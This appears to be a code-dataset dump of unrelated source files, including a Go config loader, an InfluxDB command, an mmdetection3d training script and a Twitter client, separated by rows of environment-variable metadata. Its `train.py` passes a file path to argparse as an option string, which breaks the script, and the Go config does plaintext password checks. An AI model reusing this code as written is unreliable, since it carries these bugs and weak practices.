script = "rp"
target_script = "venv/bin/rp"
if WINDOWS:
script = "rp.exe"
target_script = "venv/Scripts/rp.exe"
if self.bin_dir.joinpath(script).exists():
self.bin_dir.joinpath(script).unlink()
try:
self.bin_dir.joinpath(script).symlink_to(
self._rp.installation_dir().joinpath(target_script)
)
except OSError:
# This can happen if the user
# does not have the correct permission on Windows
shutil.copy(
self._rp.installation_dir().joinpath(target_script), self.bin_dir.joinpath(script)
)
# def add_packages(self, *packages: str, dry_run: bool):
# from poetry.config.config import Config
# from poetry.core.packages.dependency import Dependency
# from poetry.core.packages.project_package import ProjectPackage
# from poetry.installation.installer import Installer
# from poetry.packages.locker import NullLocker
# from poetry.repositories.installed_repository import InstalledRepository
#
# env = self._installation_env
#
# installed = InstalledRepository.load(env)
#
# root = ProjectPackage("rp-add-packages", "0.0.0")
# root.python_versions = ".".join(str(c) for c in env.version_info[:3])
# for package in packages:
# root.add_dependency(Dependency.create_from_pep_508(package))
#
# installer = Installer(
# console.io,
# env,
# root,
# NullLocker(self._rp.installation_dir().joinpath("poetry.lock"), {}),
# self._pool,
# Config(),
# installed=installed,
# )
#
# installer.update(True)
# installer.dry_run(dry_run)
# installer.run()
# def has_package(self, package: str, constraint: str = "*") -> bool:
# ir: InstalledRepository = self._installed_repository
# return len(ir.find_packages(Dependency(package, constraint))) > 0
|
[] |
[] |
[
"RP_HOME"
] |
[]
|
["RP_HOME"]
|
python
| 1 | 0 | |
datadir/config.go
|
package datadir
import (
"github.com/pkg/errors"
log "github.com/sirupsen/logrus"
logsyslog "github.com/sirupsen/logrus/hooks/syslog"
yaml "gopkg.in/yaml.v2"
"io/ioutil"
"log/syslog"
"net"
"os"
"path/filepath"
"time"
)
func NewConfig() *Config {
return new(Config)
}
func (self *Config) ParseDatadir() error {
cfgPath := Datapath("server.yml")
if _, err := os.Stat(cfgPath); os.IsNotExist(err) {
err = self.validateValues()
if err != nil {
return err
}
return nil
}
data, err := ioutil.ReadFile(cfgPath)
if err != nil {
return err
}
err = yaml.Unmarshal(data, self)
if err != nil {
return err
}
return self.validateValues()
}
func (self Config) ValidateSchema() bool {
if self.pValidateSchema == nil {
return true
} else {
return *self.pValidateSchema
}
}
func (self Config) Authorize(username string, password string, remoteAddress string) string {
if len(self.Authorizations) == 0 {
return "default"
} else {
for _, bauth := range self.Authorizations {
if bauth.Authorize(username, password, remoteAddress) {
namespace := bauth.Namespace
if namespace == "" {
namespace = "default"
}
return namespace
}
}
}
return ""
}
func (self *Config) validateValues() error {
if self.Version == "" {
self.Version = "1.0"
}
if self.Server.Bind == "" {
self.Server.Bind = "127.0.0.1:50055"
}
if self.pValidateSchema == nil {
v := true
self.pValidateSchema = &v
}
// tls
if self.Server.TLS.CertFile != "" {
certFile := filepath.Join(Datapath("tls/"), self.Server.TLS.CertFile)
if _, err := os.Stat(certFile); os.IsNotExist(err) {
return errors.New("config, tls certification file does not exist")
}
self.Server.TLS.CertFile = certFile
}
if self.Server.TLS.KeyFile != "" {
keyFile := filepath.Join(Datapath("tls/"), self.Server.TLS.KeyFile)
if _, err := os.Stat(keyFile); os.IsNotExist(err) {
return errors.New("config, tls key file does not exist")
}
self.Server.TLS.KeyFile = keyFile
}
// logs
if self.Logging.Output != "" {
self.Logging.Output = Datapath(self.Logging.Output)
}
// authorizations
for _, bauth := range self.Authorizations {
err := bauth.validateValues()
if err != nil {
			return err
}
}
// logging
// if self.Logging.Output == "" {
// self.Logging.Output = ""
// }
// syslog
if self.Logging.Syslog.URL == "" {
self.Logging.Syslog.URL = "localhost:514"
}
if self.Logging.Syslog.Protocol == "" {
self.Logging.Syslog.Protocol = "udp"
}
if self.Logging.Syslog.Protocol != "udp" &&
self.Logging.Syslog.Protocol != "tcp" {
return errors.New("config, invalid syslog protocol")
}
return nil
}
func (self *Config) SetupLogger() {
log.SetFormatter(&log.JSONFormatter{
TimestampFormat: time.RFC3339Nano,
})
logOutput := self.Logging.Output
if logOutput == "" || logOutput == "console" || logOutput == "stdout" {
log.SetOutput(os.Stdout)
} else if logOutput == "stderr" {
log.SetOutput(os.Stderr)
} else {
file, err := os.OpenFile(logOutput, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
if err != nil {
panic(err)
}
log.SetOutput(file)
}
if self.Logging.Syslog.Enabled {
hook, err := logsyslog.NewSyslogHook(
self.Logging.Syslog.Protocol,
self.Logging.Syslog.URL,
syslog.LOG_INFO, "")
if err != nil {
panic(err)
}
log.AddHook(hook)
}
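	// The level comes from the LOG_LEVEL environment variable (DEBUG, INFO, WARN
	// or ERROR); any other value, including an unset variable, falls back to info.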
envLogLevel := os.Getenv("LOG_LEVEL")
switch envLogLevel {
case "DEBUG":
log.SetLevel(log.DebugLevel)
case "INFO":
log.SetLevel(log.InfoLevel)
case "WARN":
log.SetLevel(log.WarnLevel)
case "ERROR":
log.SetLevel(log.ErrorLevel)
default:
log.SetLevel(log.InfoLevel)
}
}
func (self BasicAuth) Authorize(username string, password string, ipAddr string) bool {
return self.checkUser(username, password) && self.checkIP(ipAddr)
}
func (self BasicAuth) checkUser(username string, password string) bool {
return self.Username == username && self.Password == password
}
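// checkIP enforces the optional allowed_sources CIDR allow-list. Illustrative
// values (assumed, not taken from any shipped configuration): with
// AllowedSources = ["10.0.0.0/8"], a client at 10.1.2.3 is accepted while
// 192.168.1.5 is rejected; an empty list accepts every source address.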
func (self BasicAuth) checkIP(ipAddr string) bool {
if len(self.AllowedSources) > 0 {
ip := net.ParseIP(ipAddr)
if ip == nil {
log.Errorf("parse ip failed %s", ipAddr)
}
if self.allowedIPNets != nil {
for _, ipnet := range self.allowedIPNets {
if ipnet.Contains(ip) {
return true
}
}
}
return false
} else {
return true
}
}
func (self *BasicAuth) validateValues() error {
if self.AllowedSources != nil {
allowedIPNets := make([]*net.IPNet, 0)
for _, cidrStr := range self.AllowedSources {
_, ipnet, err := net.ParseCIDR(cidrStr)
if err != nil {
return err
}
allowedIPNets = append(allowedIPNets, ipnet)
}
self.allowedIPNets = allowedIPNets
}
if self.Namespace == "" {
self.Namespace = "default"
}
return nil
}
|
[
"\"LOG_LEVEL\""
] |
[] |
[
"LOG_LEVEL"
] |
[]
|
["LOG_LEVEL"]
|
go
| 1 | 0 | |
misc/acrn-config/kconfig/silentoldconfig.py
|
# Copyright (C) 2018 Intel Corporation.
# SPDX-License-Identifier: BSD-3-Clause
# This script
#
# 1. takes a Kconfig and a .config and an optional list of symbol-value pairs,
# 2. checks whether the specified symbols have the specified values in the
# given .config, and
# 3. reconstruct .config with the given list of symbol-value pairs if there
# is any disagreement.
import sys
import os
# Kconfiglib: Copyright (c) 2011-2018, Ulf Magnusson
# SPDX-License-Identifier: ISC
# Refer to scripts/kconfig/LICENSE.kconfiglib for the permission notice.
import kconfiglib
def usage():
sys.stdout.write("%s: <Kconfig file> <.config file> [<symbol1>=<value1> ...]\n" % sys.argv[0])
def main():
if len(sys.argv) < 3:
usage()
sys.exit(1)
kconfig_path = sys.argv[1]
if not os.path.isfile(kconfig_path):
sys.stderr.write("Cannot find file %s\n" % kconfig_path)
sys.exit(1)
kconfig = kconfiglib.Kconfig(kconfig_path)
# Parse the configs specified on cmdline
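    # Illustrative example (symbol name assumed): an argument such as "RELEASE=y"
    # is recorded as cmdline_conf["RELEASE"] = "y", provided a symbol named RELEASE
    # exists in the Kconfig and the value is non-empty.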
cmdline_conf = {}
for sym_val in sys.argv[3:]:
if sym_val.find("=") == -1:
continue
sym_name, val = sym_val.split("=")[:2]
if sym_name in kconfig.syms.keys() and val:
cmdline_conf[sym_name] = val
# Determine the base config.
#
# If either
#
# 1. no .config exists, or
# 2. the BOARD in the existing .config is different from the BOARD
# specified in the environment variable
#
# the defconfig will be used as the base config. Otherwise the existing
# .config is used as the base.
#
# If .config does not exist, it is required that Kconfig specifies an
# existing defconfig, otherwise this script will refuse to generate a
# .config.
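    # Illustrative example (board name assumed): with BOARD=some_board in the
    # environment, the defconfig selected for that board is used as the base
    # whenever .config is missing or its CONFIG_BOARD disagrees with that defconfig.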
config_path = sys.argv[2]
defconfig_path = kconfig.defconfig_filename
if defconfig_path and os.path.isfile(defconfig_path):
kdefconfig = kconfiglib.Kconfig(kconfig_path)
kdefconfig.load_config(defconfig_path)
else:
kdefconfig = None
need_update = False
if os.path.isfile(config_path):
kconfig.load_config(config_path)
# The BOARD given by the environment variable may be different from what
# is specified in the corresponding defconfig. So compare the value of
# CONFIG_BOARD directly. This is applicable only when CONFIG_BOARD
# exists in the Kconfig.
if kdefconfig and 'BOARD' in kconfig.syms and \
kconfig.syms['BOARD'].str_value != kdefconfig.syms['BOARD'].str_value:
kconfig = kdefconfig
sys.stdout.write("Overwrite with default configuration based on %s.\n" % defconfig_path)
need_update = True
else:
# Use the existing .config as the base.
#
# Mark need_update if any visible symbol picks a different value
# from what is specified in .config.
for sym in [x for x in kconfig.unique_defined_syms if x.visibility]:
if sym.type in [kconfiglib.BOOL, kconfiglib.TRISTATE]:
picked_value = sym.tri_value
else:
picked_value = sym.str_value
need_update = (picked_value != sym.user_value)
if need_update:
break
else:
# base on a default configuration
if kdefconfig:
kconfig = kdefconfig
sys.stdout.write("Default configuration based on %s.\n" % defconfig_path)
need_update = True
else:
# report an error if no known defconfig exists
sys.stderr.write(".config does not exist and no defconfig available for BOARD %s on SCENARIO %s.\n"
% (os.environ['BOARD'], os.environ['SCENARIO']))
sys.exit(1)
# Update the old .config with those specified on cmdline
#
# Note: the user shall be careful what configuration symbols to overwrite by
# silentoldconfig. After changing a symbol value, the invisible symbols are
# updated accordingly because they always use the default value, while
# visible symbols keep their original value in the old .config. This may
# lead to invalid .config for a specific platform.
#
# Currently it is recommended to use the following update only for
# RELEASE. For PLATFORM reinvoke defconfig is preferred.
for sym_name, val in cmdline_conf.items():
sym = kconfig.syms[sym_name]
if sym.str_value and sym.str_value != val:
kconfig.syms[sym_name].set_value(val)
need_update = True
if need_update:
kconfig.write_config(config_path)
sys.stdout.write("Configuration written to %s.\n" % config_path)
if __name__ == "__main__":
main()
|
[] |
[] |
[
"BOARD",
"SCENARIO"
] |
[]
|
["BOARD", "SCENARIO"]
|
python
| 2 | 0 | |
hue/scripts/fill_template_jinja2.py
|
#!/usr/bin/python
import os, sys
from jinja2 import Template
if len(sys.argv) != 4:
print("Allowed paremeters are 3, the source, destination and environment variable prefix parameters and you are passing %d args" % (len(sys.argv) - 1))
sys.exit(1)
template_file = sys.argv[1]
config_file = sys.argv[2]
env_prefix = sys.argv[3]
print ("template: " + template_file + ", destination: " + config_file + ", env variable prefix: " + env_prefix)
def getEnvironmentVariables(env_prefix):
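    # Keep only variables whose names contain the prefix and strip "<prefix>_" from
    # the key. Illustrative example (names assumed, not part of this script): with
    # env_prefix "HUE", HUE_DATABASE_HOST=db1 yields hue_env["DATABASE_HOST"] = "db1".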
all_env = os.environ
hue_env = {}
for key in all_env.keys():
if env_prefix in key:
new_key = key.replace(env_prefix + "_", '')
hue_env[new_key] = all_env[key]
return hue_env
if __name__ == "__main__":
template = open(template_file,"r")
template_content = template.read()
template.close()
hue_env = getEnvironmentVariables(env_prefix)
result_content = Template(template_content).render(hue_env)
result = open(config_file,"w")
result.write(result_content)
result.close()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
vendor/github.com/influxdata/influxdb/cmd/influxd/run/command.go
|
// Package run is the run (default) subcommand for the influxd command.
package run
import (
"flag"
"fmt"
"io"
"io/ioutil"
"log"
"os"
"path/filepath"
"runtime"
"strconv"
"time"
"go.uber.org/zap"
)
const logo = `
8888888 .d888 888 8888888b. 888888b.
888 d88P" 888 888 "Y88b 888 "88b
888 888 888 888 888 888 .88P
888 88888b. 888888 888 888 888 888 888 888 888 8888888K.
888 888 "88b 888 888 888 888 Y8bd8P' 888 888 888 "Y88b
888 888 888 888 888 888 888 X88K 888 888 888 888
888 888 888 888 888 Y88b 888 .d8""8b. 888 .d88P 888 d88P
8888888 888 888 888 888 "Y88888 888 888 8888888P" 8888888P"
`
// Command represents the command executed by "influxd run".
type Command struct {
Version string
Branch string
Commit string
BuildTime string
closing chan struct{}
pidfile string
Closed chan struct{}
Stdin io.Reader
Stdout io.Writer
Stderr io.Writer
Logger *zap.Logger
Server *Server
// How to get environment variables. Normally set to os.Getenv, except for tests.
Getenv func(string) string
}
// NewCommand return a new instance of Command.
func NewCommand() *Command {
return &Command{
closing: make(chan struct{}),
Closed: make(chan struct{}),
Stdin: os.Stdin,
Stdout: os.Stdout,
Stderr: os.Stderr,
Logger: zap.NewNop(),
}
}
// Run parses the config from args and runs the server.
func (cmd *Command) Run(args ...string) error {
// Parse the command line flags.
options, err := cmd.ParseFlags(args...)
if err != nil {
return err
}
// Print sweet InfluxDB logo.
fmt.Fprint(cmd.Stdout, logo)
// Mark start-up in log.
cmd.Logger.Info(fmt.Sprintf("InfluxDB starting, version %s, branch %s, commit %s",
cmd.Version, cmd.Branch, cmd.Commit))
cmd.Logger.Info(fmt.Sprintf("Go version %s, GOMAXPROCS set to %d", runtime.Version(), runtime.GOMAXPROCS(0)))
// Write the PID file.
if err := cmd.writePIDFile(options.PIDFile); err != nil {
return fmt.Errorf("write pid file: %s", err)
}
cmd.pidfile = options.PIDFile
// Parse config
config, err := cmd.ParseConfig(options.GetConfigPath())
if err != nil {
return fmt.Errorf("parse config: %s", err)
}
// Apply any environment variables on top of the parsed config
if err := config.ApplyEnvOverrides(cmd.Getenv); err != nil {
return fmt.Errorf("apply env config: %v", err)
}
// Validate the configuration.
if err := config.Validate(); err != nil {
return fmt.Errorf("%s. To generate a valid configuration file run `influxd config > influxdb.generated.conf`", err)
}
if config.HTTPD.PprofEnabled {
// Turn on block and mutex profiling.
runtime.SetBlockProfileRate(int(1 * time.Second))
runtime.SetMutexProfileFraction(1) // Collect every sample
}
// Create server from config and start it.
buildInfo := &BuildInfo{
Version: cmd.Version,
Commit: cmd.Commit,
Branch: cmd.Branch,
Time: cmd.BuildTime,
}
s, err := NewServer(config, buildInfo)
if err != nil {
return fmt.Errorf("create server: %s", err)
}
s.Logger = cmd.Logger
s.CPUProfile = options.CPUProfile
s.MemProfile = options.MemProfile
if err := s.Open(); err != nil {
return fmt.Errorf("open server: %s", err)
}
cmd.Server = s
// Begin monitoring the server's error channel.
go cmd.monitorServerErrors()
return nil
}
// Close shuts down the server.
func (cmd *Command) Close() error {
defer close(cmd.Closed)
defer cmd.removePIDFile()
close(cmd.closing)
if cmd.Server != nil {
return cmd.Server.Close()
}
return nil
}
func (cmd *Command) monitorServerErrors() {
logger := log.New(cmd.Stderr, "", log.LstdFlags)
for {
select {
case err := <-cmd.Server.Err():
logger.Println(err)
case <-cmd.closing:
return
}
}
}
func (cmd *Command) removePIDFile() {
if cmd.pidfile != "" {
if err := os.Remove(cmd.pidfile); err != nil {
cmd.Logger.Error("unable to remove pidfile", zap.Error(err))
}
}
}
// ParseFlags parses the command line flags from args and returns an options set.
func (cmd *Command) ParseFlags(args ...string) (Options, error) {
var options Options
fs := flag.NewFlagSet("", flag.ContinueOnError)
fs.StringVar(&options.ConfigPath, "config", "", "")
fs.StringVar(&options.PIDFile, "pidfile", "", "")
// Ignore hostname option.
_ = fs.String("hostname", "", "")
fs.StringVar(&options.CPUProfile, "cpuprofile", "", "")
fs.StringVar(&options.MemProfile, "memprofile", "", "")
fs.Usage = func() { fmt.Fprintln(cmd.Stderr, usage) }
if err := fs.Parse(args); err != nil {
return Options{}, err
}
return options, nil
}
// writePIDFile writes the process ID to path.
func (cmd *Command) writePIDFile(path string) error {
// Ignore if path is not set.
if path == "" {
return nil
}
// Ensure the required directory structure exists.
if err := os.MkdirAll(filepath.Dir(path), 0777); err != nil {
return fmt.Errorf("mkdir: %s", err)
}
// Retrieve the PID and write it.
pid := strconv.Itoa(os.Getpid())
if err := ioutil.WriteFile(path, []byte(pid), 0666); err != nil {
return fmt.Errorf("write file: %s", err)
}
return nil
}
// ParseConfig parses the config at path.
// It returns a demo configuration if path is blank.
func (cmd *Command) ParseConfig(path string) (*Config, error) {
// Use demo configuration if no config path is specified.
if path == "" {
cmd.Logger.Info("no configuration provided, using default settings")
return NewDemoConfig()
}
cmd.Logger.Info(fmt.Sprintf("Using configuration at: %s", path))
config := NewConfig()
if err := config.FromTomlFile(path); err != nil {
return nil, err
}
return config, nil
}
const usage = `Runs the InfluxDB server.
Usage: influxd run [flags]
-config <path>
Set the path to the configuration file.
This defaults to the environment variable INFLUXDB_CONFIG_PATH,
~/.influxdb/influxdb.conf, or /etc/influxdb/influxdb.conf if a file
is present at any of these locations.
Disable the automatic loading of a configuration file using
the null device (such as /dev/null).
-pidfile <path>
Write process ID to a file.
-cpuprofile <path>
Write CPU profiling information to a file.
-memprofile <path>
Write memory usage information to a file.
`
// Options represents the command line options that can be parsed.
type Options struct {
ConfigPath string
PIDFile string
CPUProfile string
MemProfile string
}
// GetConfigPath returns the config path from the options.
// It will return a path by searching in this order:
// 1. The CLI option in ConfigPath
// 2. The environment variable INFLUXDB_CONFIG_PATH
// 3. The first influxdb.conf file on the path:
// - ~/.influxdb
// - /etc/influxdb
func (opt *Options) GetConfigPath() string {
if opt.ConfigPath != "" {
if opt.ConfigPath == os.DevNull {
return ""
}
return opt.ConfigPath
} else if envVar := os.Getenv("INFLUXDB_CONFIG_PATH"); envVar != "" {
return envVar
}
for _, path := range []string{
os.ExpandEnv("${HOME}/.influxdb/influxdb.conf"),
"/etc/influxdb/influxdb.conf",
} {
if _, err := os.Stat(path); err == nil {
return path
}
}
return ""
}
|
[
"\"INFLUXDB_CONFIG_PATH\""
] |
[] |
[
"INFLUXDB_CONFIG_PATH"
] |
[]
|
["INFLUXDB_CONFIG_PATH"]
|
go
| 1 | 0 | |
IntensityNet_testing/train.py
|
# Copyright (c) OpenMMLab. All rights reserved.
from __future__ import division
import argparse
import copy
import os
import time
import warnings
from os import path as osp
import mmcv
import torch
import torch.distributed as dist
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmdet import __version__ as mmdet_version
from mmdet3d import __version__ as mmdet3d_version
from mmdet3d.apis import init_random_seed, train_model
from mmdet3d.datasets import build_dataset
from mmdet3d.models import build_model
from mmdet3d.utils import collect_env, get_root_logger
from mmdet.apis import set_random_seed
from mmseg import __version__ as mmseg_version
try:
# If mmdet version > 2.20.0, setup_multi_processes would be imported and
# used from mmdet instead of mmdet3d.
from mmdet.utils import setup_multi_processes
except ImportError:
from mmdet3d.utils import setup_multi_processes
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
configpath = "/workspace/mmdetection3d/configs/second/hv_second_secfpn_6x8_80e_kitti-3d-car.py"
parser.add_argument('config', configpath, help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--auto-resume',
action='store_true',
help='resume from the latest checkpoint automatically')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int,
help='(Deprecated, please use --gpu-id) number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='(Deprecated, please use --gpu-id) ids of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-id',
type=int,
default=0,
help='number of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=0, help='random seed')
parser.add_argument(
'--diff-seed',
action='store_true',
help='Whether or not set different seeds for different ranks')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file (deprecate), '
'change to --cfg-options instead.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
parser.add_argument(
'--autoscale-lr',
action='store_true',
help='automatically scale lr with the number of gpus')
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.cfg_options:
raise ValueError(
'--options and --cfg-options cannot be both specified, '
'--options is deprecated in favor of --cfg-options')
if args.options:
warnings.warn('--options is deprecated in favor of --cfg-options')
args.cfg_options = args.options
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# set multi-process settings
setup_multi_processes(cfg)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > segment in file > filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.auto_resume:
cfg.auto_resume = args.auto_resume
        warnings.warn('`--auto-resume` is only supported when mmdet '
                      'version >= 2.20.0 for 3D detection model or '
                      'mmsegmentation version >= 0.21.0 for 3D '
                      'segmentation model')
if args.gpus is not None:
cfg.gpu_ids = range(1)
warnings.warn('`--gpus` is deprecated because we only support '
'single GPU mode in non-distributed training. '
'Use `gpus=1` now.')
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids[0:1]
warnings.warn('`--gpu-ids` is deprecated, please use `--gpu-id`. '
'Because we only support single GPU mode in '
'non-distributed training. Use the first GPU '
'in `gpu_ids` now.')
if args.gpus is None and args.gpu_ids is None:
cfg.gpu_ids = [args.gpu_id]
if args.autoscale_lr:
# apply the linear scaling rule (https://arxiv.org/abs/1706.02677)
cfg.optimizer['lr'] = cfg.optimizer['lr'] * len(cfg.gpu_ids) / 8
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# re-set gpu_ids with distributed training mode
_, world_size = get_dist_info()
cfg.gpu_ids = range(world_size)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
# specify logger name, if we still use 'mmdet', the output info will be
# filtered and won't be saved in the log_file
# TODO: ugly workaround to judge whether we are training det or seg model
if cfg.model.type in ['EncoderDecoder3D']:
logger_name = 'mmseg'
else:
logger_name = 'mmdet'
logger = get_root_logger(
log_file=log_file, log_level=cfg.log_level, name=logger_name)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([(f'{k}: {v}') for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
meta['config'] = cfg.pretty_text
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
seed = init_random_seed(args.seed)
seed = seed + dist.get_rank() if args.diff_seed else seed
logger.info(f'Set random seed to {seed}, '
f'deterministic: {args.deterministic}')
set_random_seed(seed, deterministic=args.deterministic)
cfg.seed = seed
meta['seed'] = seed
meta['exp_name'] = osp.basename(args.config)
model = build_model(
cfg.model,
train_cfg=cfg.get('train_cfg'),
test_cfg=cfg.get('test_cfg'))
model.init_weights()
logger.info(f'Model:\n{model}')
datasets = [build_dataset(cfg.data.train)]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
# in case we use a dataset wrapper
if 'dataset' in cfg.data.train:
val_dataset.pipeline = cfg.data.train.dataset.pipeline
else:
val_dataset.pipeline = cfg.data.train.pipeline
# set test_mode=False here in deep copied config
# which do not affect AP/AR calculation later
# refer to https://mmdetection3d.readthedocs.io/en/latest/tutorials/customize_runtime.html#customize-workflow # noqa
val_dataset.test_mode = False
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmdet version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmdet_version=mmdet_version,
mmseg_version=mmseg_version,
mmdet3d_version=mmdet3d_version,
config=cfg.pretty_text,
CLASSES=datasets[0].CLASSES,
PALETTE=datasets[0].PALETTE # for segmentors
if hasattr(datasets[0], 'PALETTE') else None)
# add an attribute for visualization convenience
model.CLASSES = datasets[0].CLASSES
train_model(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"LOCAL_RANK"
] |
[]
|
["LOCAL_RANK"]
|
python
| 1 | 0 | |
twitter.go
|
package main
import (
"net/http"
"os"
"github.com/dghubble/go-twitter/twitter"
"github.com/dghubble/oauth1"
)
// TwitterTrendsSvc accesses twitter
type TwitterTrendsSvc interface {
Trends(woeid int) ([]twitter.Trend, error)
Close()
TweetsFor(string) ([]string, error)
}
type twitterTrends struct {
client *twitter.Client
}
func (tt *twitterTrends) Close() {}
func (tt *twitterTrends) Trends(woeid int) ([]twitter.Trend, error) {
ts, res, err := tt.client.Trends.Place(int64(woeid), nil)
if err != nil || res.StatusCode != http.StatusOK {
return nil, err
}
var trends []twitter.Trend
for _, xyz := range ts {
for _, trend := range xyz.Trends {
trends = append(trends, trend)
}
}
return trends, nil
}
func (tt *twitterTrends) TweetsFor(query string) ([]string, error) {
var tweets []string
search, _, err := tt.client.Search.Tweets(&twitter.SearchTweetParams{
Query: query,
Count: 100,
Lang: "pt",
})
if err != nil {
return nil, err
}
for _, tweet := range search.Statuses {
tweets = append(tweets, tweet.Text)
}
return tweets, nil
}
// NewTwitterTrendsSvc creates a new TwitterTrendsSvc
func NewTwitterTrendsSvc() TwitterTrendsSvc {
return &twitterTrends{
client: newClient(),
}
}
func newClient() *twitter.Client {
consumerKey := os.Getenv("CONSUMER_KEY")
consumerSecret := os.Getenv("CONSUMER_SECRET")
accessToken := os.Getenv("ACCESS_TOKEN")
accessSecret := os.Getenv("ACCESS_SECRET")
config := oauth1.NewConfig(consumerKey, consumerSecret)
token := oauth1.NewToken(accessToken, accessSecret)
client := twitter.NewClient(config.Client(oauth1.NoContext, token))
// Tests connection and crashes app if there is bad auth data
_, _, err := client.Timelines.HomeTimeline(&twitter.HomeTimelineParams{
Count: 20,
})
if err != nil {
panic(err.Error())
}
return client
}
|
[
"\"CONSUMER_KEY\"",
"\"CONSUMER_SECRET\"",
"\"ACCESS_TOKEN\"",
"\"ACCESS_SECRET\""
] |
[] |
[
"CONSUMER_KEY",
"ACCESS_SECRET",
"CONSUMER_SECRET",
"ACCESS_TOKEN"
] |
[]
|
["CONSUMER_KEY", "ACCESS_SECRET", "CONSUMER_SECRET", "ACCESS_TOKEN"]
|
go
| 4 | 0 | |
pkg/v1/google/auth_test.go
|
// +build !arm64
// +build !darwin
// Copyright 2018 Google LLC All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package google
import (
"bytes"
"fmt"
"os"
"os/exec"
"strings"
"testing"
"github.com/google/go-containerregistry/pkg/authn"
"github.com/google/go-containerregistry/pkg/logs"
"github.com/google/go-containerregistry/pkg/name"
"golang.org/x/oauth2"
)
const (
// Fails to parse as JSON at all.
badoutput = ""
// Fails to parse token_expiry format.
badexpiry = `
{
"credential": {
"access_token": "mytoken",
"token_expiry": "most-definitely-not-a-date"
}
}`
// Expires in 6,000 years. Hopefully nobody is using software then.
success = `
{
"credential": {
"access_token": "mytoken",
"token_expiry": "8018-12-02T04:08:13Z"
}
}`
)
// We'll invoke ourselves with a special environment variable in order to mock
// out the gcloud dependency of gcloudSource. The exec package does this, too.
//
// See: https://www.joeshaw.org/testing-with-os-exec-and-testmain/
//
// TODO(#908): This doesn't work on arm64 or darwin for some reason.
func TestMain(m *testing.M) {
switch os.Getenv("GO_TEST_MODE") {
case "":
// Normal test mode
os.Exit(m.Run())
case "error":
// Makes cmd.Run() return an error.
os.Exit(2)
case "badoutput":
// Makes the gcloudOutput Unmarshaler fail.
fmt.Println(badoutput)
case "badexpiry":
// Makes the token_expiry time parser fail.
fmt.Println(badexpiry)
case "success":
// Returns a seemingly valid token.
fmt.Println(success)
}
}
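// newGcloudCmdMock returns a command factory that re-executes the test binary
// with GO_TEST_MODE set, so TestMain above can stand in for the real gcloud call.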
func newGcloudCmdMock(env string) func() *exec.Cmd {
return func() *exec.Cmd {
cmd := exec.Command(os.Args[0])
cmd.Env = []string{fmt.Sprintf("GO_TEST_MODE=%s", env)}
return cmd
}
}
func TestGcloudErrors(t *testing.T) {
cases := []struct {
env string
// Just look for the prefix because we can't control other packages' errors.
wantPrefix string
}{{
env: "error",
wantPrefix: "error executing `gcloud config config-helper`:",
}, {
env: "badoutput",
wantPrefix: "failed to parse `gcloud config config-helper` output:",
}, {
env: "badexpiry",
